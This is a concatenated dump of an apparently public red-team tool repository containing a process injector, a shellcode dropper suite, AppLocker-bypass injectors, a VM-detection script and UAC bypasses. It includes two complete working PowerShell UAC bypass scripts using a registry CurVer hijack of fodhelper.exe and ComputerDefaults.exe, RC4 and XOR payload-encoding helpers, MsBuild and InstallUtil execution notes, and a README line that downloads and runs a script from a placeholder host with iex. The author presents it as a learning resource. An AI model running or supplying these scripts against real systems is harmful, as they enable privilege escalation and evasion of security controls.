├── RainCaller ├── Server │ ├── requirements.txt │ └── main.py ├── Client │ ├── RainCaller.sln │ └── RainCaller │ │ ├── Properties │ │ └── AssemblyInfo.cs │ │ ├── RainCaller.csproj │ │ ├── RainCaller.cs │ │ ├── Native.cs │ │ └── DInvoke.cs ├── README.md └── .gitignore ├── Marlowe ├── .gitignore ├── README.md └── Marlowe.ps1 ├── SharpSectionJect ├── SharpSectionJectMsBuild │ ├── Notes.txt │ └── SharpSectionJect.xml ├── SharpSectionJectInstallUtil │ ├── Notes.txt │ └── SharpSectionJect.cs ├── enc.py ├── SharpSectionJect │ ├── Properties │ │ └── AssemblyInfo.cs │ ├── SharpSectionJect.csproj │ └── SharpSectionJect.cs ├── SharpSectionJectDLL │ ├── Properties │ │ └── AssemblyInfo.cs │ ├── SharpSectionJectDLL.csproj │ └── SharpSectionJectDLL.cs └── SharpSectionJect.sln ├── Ballista ├── utils │ └── reflectionUtil.py ├── Ballista.sln ├── Ballista │ ├── Properties │ │ └── AssemblyInfo.cs │ ├── Ballista.csproj │ ├── Ballista.cs │ ├── Releases.cs │ ├── Syscalls.cs │ └── Native.cs ├── README.md └── .gitignore ├── UAC_Bypasses ├── FodHelper.ps1 └── ComputerDefaults.ps1 ├── LICENSE ├── README.md └── .gitignore /RainCaller/Server/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask 2 | argparse 3 | pycrypto -------------------------------------------------------------------------------- /Marlowe/.gitignore: -------------------------------------------------------------------------------- 1 | .vscode/* 2 | !.vscode/settings.json 3 | !.vscode/tasks.json 4 | !.vscode/launch.json 5 | !.vscode/extensions.json 6 | *.code-workspace 7 | 8 | # Local History for Visual Studio Code 9 | .history/ -------------------------------------------------------------------------------- /SharpSectionJect/SharpSectionJectMsBuild/Notes.txt: -------------------------------------------------------------------------------- 1 | For 64 bit: 2 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe SharpSectionJect.xml 3 | 4 | For 32 bit: 5 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe SharpSectionJect.xml -------------------------------------------------------------------------------- /SharpSectionJect/SharpSectionJectInstallUtil/Notes.txt: -------------------------------------------------------------------------------- 1 | Compile with: 2 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:SharpSectionJect.dll SharpSectionJect.cs 3 | 4 | Run with: 5 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /U /logfile= /logtoconsole=false SharpSectionJect.dll 6 | 7 | - Use C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe for 32 bit. -------------------------------------------------------------------------------- /SharpSectionJect/enc.py: -------------------------------------------------------------------------------- 1 | #pip install pycryptodome 2 | import sys, base64 3 | from Crypto.Cipher import ARC4 4 | 5 | def RC4(data, key): 6 | cipher = ARC4.new(key.encode('utf-8')) 7 | return cipher.encrypt(data) 8 | 9 | def B64Enc(text): 10 | return base64.b64encode(text).decode('utf-8') 11 | 12 | def B64Dec(text): 13 | return base64.b64decode(text) 14 | 15 | if __name__ == '__main__': 16 | if len(sys.argv) != 3: 17 | sys.exit(f'{sys.argv[0]} ') 18 | 19 | print('\n' + B64Enc(RC4(B64Dec(sys.argv[1]), sys.argv[2]))) -------------------------------------------------------------------------------- /Ballista/utils/reflectionUtil.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import base64 3 | 4 | def XOR(text, key): 5 | output = "" 6 | for i, character in enumerate(text): 7 | output += chr(ord(character) ^ ord(key[i % len(key)])) 8 | return output 9 | 10 | def B64Enc(text): 11 | return base64.b64encode(text.encode('ascii')).decode('ascii') 12 | 13 | def Debug(text, key): 14 | print(XOR(base64.b64decode(text.encode('ascii')).decode('ascii'), key)) 15 | 16 | if __name__ == '__main__': 17 | if len(sys.argv) != 5: 18 | sys.exit(f'{sys.argv[0]} ') 19 | 20 | print('\n' + B64Enc(XOR(f'{sys.argv[2]};{sys.argv[3]};{sys.argv[4]}\n', sys.argv[1])) + '\n') -------------------------------------------------------------------------------- /UAC_Bypasses/FodHelper.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-BypassFodHelper { 2 | Param ( 3 | [String]$program = "cmd /c start powershell.exe" 4 | ) 5 | 6 | New-Item "HKCU:\Software\Classes\.versionobf\Shell\Open\command" -Force| Out-Null 7 | Set-ItemProperty "HKCU:\Software\Classes\.versionobf\Shell\Open\command" -Name "(default)" -Value $program -Force | Out-Null 8 | 9 | New-Item -Path "HKCU:\Software\Classes\ms-settings\CurVer" -Force|out-null 10 | Set-ItemProperty "HKCU:\Software\Classes\ms-settings\CurVer" -Name "(default)" -value ".versionobf" -force | Out-Null 11 | 12 | Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden 13 | 14 | Start-Sleep 5 15 | 16 | Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force 17 | Remove-Item "HKCU:\Software\Classes\.versionobf\" -Recurse -Force 18 | } -------------------------------------------------------------------------------- /UAC_Bypasses/ComputerDefaults.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-BypassComputerDefaults { 2 | Param ( 3 | [String]$program = "powershell.exe" 4 | ) 5 | 6 | New-Item "HKCU:\software\classes\.versionobf\shell\open\command" -Force | Out-Null 7 | New-ItemProperty "HKCU:\software\classes\.versionobf\shell\open\command" -Name "DelegateExecute" -Value $null -Force | Out-Null 8 | Set-ItemProperty "HKCU:\software\classes\.versionobf\shell\open\command" -Name "(default)" -Value "$program" -Force | Out-Null 9 | 10 | New-Item -Path "HKCU:\Software\Classes\ms-settings\CurVer" -Force | Out-Null 11 | Set-ItemProperty "HKCU:\Software\Classes\ms-settings\CurVer" -Name "(default)" -value ".versionobf" -force | Out-Null 12 | 13 | Start-Process "ComputerDefaults.exe" 14 | Write-Host "Starting the program." 15 | Start-Sleep -Seconds 7 16 | 17 | Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force 18 | Remove-Item "HKCU:\Software\Classes\.versionobf\" -Recurse -Force 19 | } 20 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Copyright 2022 v3ded 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: 4 | 5 | The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. 6 | 7 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. -------------------------------------------------------------------------------- /Marlowe/README.md: -------------------------------------------------------------------------------- 1 | # Marlowe 2 | **Marlowe** is a PowerShell script which uses WMI to query local and remote systems with the aim of revealing whether said systems are virtual machines. 3 | 4 | # Usage 5 | ### Local system 6 | ``` 7 | PS C:\Users\tester> . .\Marlowe.ps1; Invoke-Marlowe 8 | VM detected! (6/8) 9 | ``` 10 | ``` 11 | C:\> powershell.exe -ep bypass -nop -c "iex(New-Object Net.WebClient).downloadString('hxxp://malhost.dev/marlowe.ps1'); Invoke-Marlowe" 12 | VM detected! (4/8) 13 | ``` 14 | 15 | ### Remote system 16 | ``` 17 | PS C:\Users\tester> . .\Marlowe.ps1; Invoke-Marlowe -Machine "fs-m01" 18 | VM detected! (4/8) 19 | ``` 20 | 21 | ### Alternative Usage 22 | One can also utilize individual functions that **Marlowe** uses in order to evaluate whether target system is a VM or not. If the chosen function returns `True` or a non-zero value, target system is (likely) a VM. 23 | ``` 24 | PS C:\Users\tester> . .\Marlowe.ps1 ; Check-VMProcesses 25 | True 26 | ``` 27 | 28 | # False Positives 29 | - 05/23/21 - `Check-PortConnector` returns false positives on ESXi (tested on v7.1) -------------------------------------------------------------------------------- /Ballista/Ballista.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30717.126 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Ballista", "Ballista\Ballista.csproj", "{1D13FD10-3630-48F4-80AF-D0D2BF68AD95}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {1D13FD10-3630-48F4-80AF-D0D2BF68AD95}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {1D13FD10-3630-48F4-80AF-D0D2BF68AD95}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {1D13FD10-3630-48F4-80AF-D0D2BF68AD95}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {1D13FD10-3630-48F4-80AF-D0D2BF68AD95}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {B111CEDC-17AC-489B-B130-1A820067D840} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /RainCaller/Client/RainCaller.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.31313.79 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "RainCaller", "RainCaller\RainCaller.csproj", "{D4149924-35F1-4D5A-BE6F-07FA0541EDE6}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {D4149924-35F1-4D5A-BE6F-07FA0541EDE6}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {D4149924-35F1-4D5A-BE6F-07FA0541EDE6}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {D4149924-35F1-4D5A-BE6F-07FA0541EDE6}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {D4149924-35F1-4D5A-BE6F-07FA0541EDE6}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {683C8717-525C-42C3-B4C1-E0D025F9DF9A} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Ballista/Ballista/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("Ballista")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("Ballista")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("1d13fd10-3630-48f4-80af-d0d2bf68ad95")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /RainCaller/Client/RainCaller/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("RainCaller")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("RainCaller")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("d4149924-35f1-4d5a-be6f-07fa0541ede6")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /SharpSectionJect/SharpSectionJect/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("SharpSectionJect")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("SharpSectionJect")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("90a21b70-e37a-46a1-8686-112ef3276af1")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /SharpSectionJect/SharpSectionJectDLL/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("SharpSectionJectDLL")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("SharpSectionJectDLL")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("cf3dd96f-0b1e-48dd-ae70-0aab0dfb270e")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Disclaimer 2 | This repository and the code in it is provided as is. I won't respond to any pull requests or issues. Be responsible and don't use the provided code / tools in a malicious way. I do **not** condone or endorse malicious behavior. 3 | 4 | # Introduction 5 | This repository contains a dump of few tools I wrote over the past 2-3 years. The main reason behind this dump is that most of the methods used in these tools are now considered outdated or obsolete (to an extent). While said tools might not be as useful in real life engagements, I hope someone can at least use them as a learning resource instead. 6 | 7 | # Tools 8 | 9 | ### [Ballista](Ballista/) 10 | **Ballista** is a C# tool responsible for x64 cross-process injection. The tool relies on `NtCreateSection()` and `NtMapViewOfSection()` syscalls in order to evade user level API hooking. 11 | 12 | ###### Keywords 13 | - C# 14 | - Syscalls 15 | - Process Injection 16 | - Sections 17 | 18 | *** 19 | 20 | ### [Marlowe](Marlowe/) 21 | **Marlowe** is a PowerShell script which uses WMI to query local and remote systems with the aim of revealing whether said systems are virtual machines. 22 | 23 | ###### Keywords 24 | - PowerShell 25 | - WMI 26 | 27 | *** 28 | 29 | ### [RainCaller](RainCaller/) 30 | **RainCaller** is a shellcode dropper suite consisting of a *Python3* webserver (server) and a *C#* dropper (client). 31 | 32 | ###### Keywords 33 | - C# 34 | - DInvoke 35 | - Python 36 | - Dropper 37 | 38 | *** 39 | 40 | ### [SharpSectionJect](SharpSectionJect/) 41 | **SharpSectionJect** is a collection of C# process injectors in various formats. More specifically *EXE*, *DLL*, *MsBuild* and *InstallUtil* formats. 42 | 43 | ###### Keywords 44 | - C# 45 | - PInvoke 46 | - Sections 47 | - AppLocker bypass 48 | 49 | *** 50 | 51 | ### [UAC_Bypasses](UAC_Bypasses/) 52 | **UAC_Bypasses** is a collection of PowerShell UAC bypasses. These bypasses utilize the *CurVer* trick to bypass registry monitoring. More about this technique can be found on my blog [here](https://v3ded.github.io/redteam/utilizing-programmatic-identifiers-progids-for-uac-bypasses 53 | ). 54 | 55 | ###### Keywords 56 | - PowerShell 57 | - CurVer 58 | - UAC Bypass -------------------------------------------------------------------------------- /SharpSectionJect/SharpSectionJect.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.31313.79 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpSectionJect", "SharpSectionJect\SharpSectionJect.csproj", "{90A21B70-E37A-46A1-8686-112EF3276AF1}" 7 | EndProject 8 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpSectionJectDLL", "SharpSectionJectDLL\SharpSectionJectDLL.csproj", "{CF3DD96F-0B1E-48DD-AE70-0AAB0DFB270E}" 9 | EndProject 10 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{FB3214CF-5BBC-4799-BF9C-16069881A6E6}" 11 | ProjectSection(SolutionItems) = preProject 12 | SharpSectionJectInstallUtil\SharpSectionJect.cs = SharpSectionJectInstallUtil\SharpSectionJect.cs 13 | SharpSectionJectMsBuild\SharpSectionJect.xml = SharpSectionJectMsBuild\SharpSectionJect.xml 14 | EndProjectSection 15 | EndProject 16 | Global 17 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 18 | Debug|Any CPU = Debug|Any CPU 19 | Release|Any CPU = Release|Any CPU 20 | EndGlobalSection 21 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 22 | {90A21B70-E37A-46A1-8686-112EF3276AF1}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 23 | {90A21B70-E37A-46A1-8686-112EF3276AF1}.Debug|Any CPU.Build.0 = Debug|Any CPU 24 | {90A21B70-E37A-46A1-8686-112EF3276AF1}.Release|Any CPU.ActiveCfg = Release|Any CPU 25 | {90A21B70-E37A-46A1-8686-112EF3276AF1}.Release|Any CPU.Build.0 = Release|Any CPU 26 | {CF3DD96F-0B1E-48DD-AE70-0AAB0DFB270E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 27 | {CF3DD96F-0B1E-48DD-AE70-0AAB0DFB270E}.Debug|Any CPU.Build.0 = Debug|Any CPU 28 | {CF3DD96F-0B1E-48DD-AE70-0AAB0DFB270E}.Release|Any CPU.ActiveCfg = Release|Any CPU 29 | {CF3DD96F-0B1E-48DD-AE70-0AAB0DFB270E}.Release|Any CPU.Build.0 = Release|Any CPU 30 | EndGlobalSection 31 | GlobalSection(SolutionProperties) = preSolution 32 | HideSolutionNode = FALSE 33 | EndGlobalSection 34 | GlobalSection(ExtensibilityGlobals) = postSolution 35 | SolutionGuid = {10A613CB-AF45-47D1-BD27-8E207A6101F1} 36 | EndGlobalSection 37 | EndGlobal 38 | -------------------------------------------------------------------------------- /SharpSectionJect/SharpSectionJectDLL/SharpSectionJectDLL.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {CF3DD96F-0B1E-48DD-AE70-0AAB0DFB270E} 8 | Library 9 | Properties 10 | SharpSectionJectDLL 11 | SharpSectionJectDLL 12 | v4.0 13 | 512 14 | true 15 | 16 | 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | pdbonly 27 | true 28 | bin\Release\ 29 | TRACE 30 | prompt 31 | 4 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | -------------------------------------------------------------------------------- /SharpSectionJect/SharpSectionJect/SharpSectionJect.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {90A21B70-E37A-46A1-8686-112EF3276AF1} 8 | Exe 9 | SharpSectionJect 10 | SharpSectionJect 11 | v4.0 12 | 512 13 | true 14 | 15 | 16 | AnyCPU 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | AnyCPU 27 | pdbonly 28 | true 29 | bin\Release\ 30 | TRACE 31 | prompt 32 | 4 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | -------------------------------------------------------------------------------- /RainCaller/Client/RainCaller/RainCaller.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {D4149924-35F1-4D5A-BE6F-07FA0541EDE6} 8 | Exe 9 | RainCaller 10 | RainCaller 11 | v4.0 12 | 512 13 | true 14 | 15 | 16 | AnyCPU 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | AnyCPU 27 | pdbonly 28 | true 29 | bin\Release\ 30 | TRACE 31 | prompt 32 | 4 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /Marlowe/Marlowe.ps1: -------------------------------------------------------------------------------- 1 | function Check-PortConnector { 2 | Param([string]$Machine = "localhost") 3 | 4 | return !(Get-WmiObject Win32_PortConnector -ComputerName $Machine -ErrorAction Stop) 5 | } 6 | 7 | function Check-VMProcesses { 8 | Param([string]$Machine = "localhost") 9 | 10 | return (Get-WmiObject Win32_Process -ComputerName $Machine -ErrorAction Stop | Select ProcessName | Select-String "vboxtray|vboxservice|vmtoolsd|vm3dservice" -Quiet) -ne $null 11 | } 12 | 13 | function Check-CPUInfo { 14 | Param([string]$Machine = "localhost") 15 | 16 | $info = Get-WmiObject Win32_Processor -ComputerName $Machine -ErrorAction Stop | Select-Object NumberOfLogicalProcessors, Name 17 | return (($info | Select-Object -ExpandProperty NumberOfLogicalProcessors) -ge 32) + (($info | Select-Object -ExpandProperty Name | Select-String "epyc|xeon" -Quiet) -ne $null) 18 | } 19 | 20 | function Check-BiosSerial { 21 | Param([string]$Machine = "localhost") 22 | 23 | return (Get-WmiObject Win32_Bios -ComputerName $Machine -ErrorAction Stop | Select-Object -ExpandProperty SerialNumber) -eq 0 24 | } 25 | 26 | function Check-SystemMakerInfo { 27 | Param([string]$Machine = "localhost") 28 | 29 | $info = Get-WmiObject Win32_ComputerSystem -ComputerName $Machine -ErrorAction Stop | Select-Object Model, Manufacturer 30 | return (($info | Select-Object -ExpandProperty Model | Select-String "virtualbox|vmware" -Quiet) -ne $null) + (($info | Select-Object -ExpandProperty Manufacturer | Select-String "innotek|vmware" -Quiet) -ne $null) 31 | } 32 | 33 | function Check-DriveSize { 34 | Param([string]$Machine = "localhost") 35 | 36 | return (Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='C:'" -ComputerName $Machine -ErrorAction Stop | Select-Object -ExpandProperty Size) -le 121111111111 37 | } 38 | 39 | function Invoke-Marlowe { 40 | Param([string]$Machine = "localhost") 41 | 42 | $count = 0 43 | $count += Check-PortConnector -Machine $Machine 44 | $count += Check-VMProcesses -Machine $Machine 45 | $count += Check-CPUInfo -Machine $Machine 46 | $count += Check-BiosSerial -Machine $Machine 47 | $count += Check-SystemMakerInfo -Machine $Machine 48 | $count += Check-DriveSize -Machine $Machine 49 | 50 | If($count -ge 3) { 51 | Write-Host "VM detected! ($count/8)" 52 | } 53 | else { 54 | Write-Host "Not a VM! ($count/8)" 55 | } 56 | } -------------------------------------------------------------------------------- /Ballista/Ballista/Ballista.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {1D13FD10-3630-48F4-80AF-D0D2BF68AD95} 8 | Exe 9 | Ballista 10 | Ballista 11 | v4.0 12 | 512 13 | true 14 | 15 | 16 | AnyCPU 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | true 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | true 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | -------------------------------------------------------------------------------- /Ballista/README.md: -------------------------------------------------------------------------------- 1 | # Ballista 2 | **Ballista** is a C# tool responsible for x64 cross-process injection. The tool relies on `NtCreateSection()` and `NtMapViewOfSection()` syscalls in order to evade user level API hooking. 3 | 4 | # Usage 5 | ```console 6 | Ballista.exe 7 | Ballista.exe 8 | ``` 9 | 10 | | Argument | Description | 11 | | ----------- | ----------- | 12 | | release | Target Release ID (see the releases section) | 13 | | x64_pid | Process ID of a remote process | 14 | | x64_processName | Name of an x64 process to inject into | 15 | | b64_x64sc | Base64 encoded shellcode | 16 | 17 | 18 | ## Releases 19 | > Note: *Windows Server 2016* and *2019* offsets rely on an assumption that the offsets in these specific systems are the same as in their Windows 10 version equivalents. Further testing is advised. 20 | 21 | ### Windows 10 22 | | Windows 10 Version | Release ID | 23 | | ----------- | ----------- | 24 | | 20H2 | 1 | 25 | | 2004 | 2 | 26 | | 1909 | 3 | 27 | | 1903 | 4 | 28 | | 1809 | 5 | 29 | | 1803 | 6 | 30 | | 1709 | 7 | 31 | | 1703 | 8 | 32 | | 1607 | 9 | 33 | | 1511 | 10 | 34 | | 1507 | 11 | 35 | 36 | 37 | ### Windows 7 38 | | Windows 7 Version | Release ID | 39 | | ----------- | ----------- | 40 | | SP1 | 12 | 41 | | SP0 | 12 | 42 | 43 | 44 | ### Windows Server 2019 45 | | Windows 10 Version | Release ID | 46 | | ----------- | ----------- | 47 | | 20H2 | 1 | 48 | | 2004 | 2 | 49 | | 1909 | 3 | 50 | | 1903 | 4 | 51 | | 2019 LTSC (1809) | 5 | 52 | 53 | 54 | ### Windows Server 2016 55 | | Windows 10 Version | Release ID | 56 | | ----------- | ----------- | 57 | | 2016 LTSC (1607) | 9 | 58 | | 1511 | 10 | 59 | | 1507 | 11 | 60 | 61 | 62 | ### Windows Server 2012 63 | | Server 2012 Version | Release ID | 64 | | ----------- | ----------- | 65 | | R2 | 13 | 66 | | SP0 | 14 | 67 | 68 | 69 | # Reflection 70 | **Ballista** can be easily reflected into memory using a serialized base64 string, which can be generated by `reflectionUtil.py`: 71 | ```powershell 72 | PS C:\Users\tester> python .\reflectionUtil.py Key 1 notepad /EiD5PDow... 73 | WV4CAxsSHxMIX0cgBShaJysd... 74 | 75 | PS C:\Users\tester> [System.Reflection.Assembly]::LoadFile("C:\Users\tester\Ballista.exe") 76 | 77 | GAC Version Location 78 | --- ------- -------- 79 | False v4.0.30319 